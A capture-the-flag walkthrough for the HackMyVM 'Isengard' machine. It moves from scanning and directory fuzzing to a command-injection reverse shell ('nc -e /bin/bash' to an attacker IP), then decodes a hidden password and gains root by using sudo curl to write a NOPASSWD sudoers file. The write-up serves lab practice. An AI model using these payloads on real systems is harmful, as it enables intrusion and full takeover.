Isengard Writeup – HackMyVM – Walkthrough

Isengard is an easy machine from HackMyVM by bit. It works well on VirtualBox. As for the machine, we can get into the machine by using Remote Command Execution. Similarly, for the root part, we have to abuse the sudo permissions. “Isengard Writeup – HackMyVM – Walkthrough”

Link to the machine: https://hackmyvm.eu/machines/machine.php?vm=Isengard

Identify the target

Firstly, I got the IP address of the target by scanning the live hosts.

sudo netdiscover -r 10.0.0.0/24

Scan open ports

Next, I scanned open ports on the target that are exposed to the network. This allows us to interact with the machine and gives a lot of insights into it.

nmap -v -T4 -p- -sC -sV -oN nmap.log 10.0.0.102

Here, we only see port 80 open. Also, we don’t have an SSH port. Hence, we must execute remote commands on this machine to get the shell. Either this, or we have to open the SSH port somehow. But, in this machine, there is a vulnerability of the remote command execution.

Enumerate the webserver

The homepage has a CSS file that has a path to look at.

There are a lot of rabbit holes throughout the website. However, I will be skipping these. Next, I bruteforced other paths inside the recently identified path.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.0.0.102/y0ush4lln0tp4ss/ -x php,html,txt -o dir-youshallnotpass-medium.txt

Likewise, I did the same for the /east path.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://10.0.0.102/y0ush4lln0tp4ss/east -x php,html,txt -o dir-east-big.txt

Finally, I got a script that might have a possibility of either LFI or RCE. Thus, I checked for the parameters.

ffuf -w /usr/share/seclists/Discovery/Web-Content/big.txt -u 'http://10.0.0.102/y0ush4lln0tp4ss/east/mellon.php?FUZZ=id' -fs 0

Now, I could spawn a reverse shell. Therefore, I listened on port 9001.

nc -nlvp 9001

I checked the manual page of “netcat” on the target and found that it is the traditional one that allows the “-e” flag.

Since it was the easy way, I spawned the reverse shell.

?frodo=nc -e /bin/bash 10.0.0.4 9001

Next, I upgraded the shell.

Upgrade to an intelligent reverse shell

Switch to the user

On the “east” directory, there is a readme file.

ls -al

The readme gives us another hint.

Here, we have a hint to find the ring file. There is already a “ring.zip” file on the directory which is not the one we are looking for. Thus, I searched for the file.

find / -name "ring.zip" -exec ls -al {} \; 2>/dev/null

Lastly, I extracted the zip to a new directory in /tmp.

mkdir /tmp/ring
unzip /opt/.nothingtoseehere/.donotcontinue/.stop/.heWillKnowYouHaveIt/.willNotStop/.ok_butDestroyIt/ring.zip -d /tmp/ring/

From the zip file, we have a base64 encoded text. This is encoded multiple times.

base64 -d /tmp/ring/ring.txt | base64 -d

The decoded text is the password for the user sauron on the target.

Root privilege escalation

Lastly, we have the binary “curl” that the user can execute as any user.

There are several ways to get the shell. One easy way is to overwrite the /etc/passwd file. Likewise, since we have sudo, we can add sudo permissions to execute all binaries for the user. I would do the sudo method for this writeup.

First of all, I created a sudoers file in my /tmp directory.

echo 'sauron ALL=(ALL) NOPASSWD: ALL' > /tmp/sauron
sudo curl file:///tmp/sauron -o /etc/sudoers.d/sauron
sudo -l

Finally, I could switch to the root.

sudo -i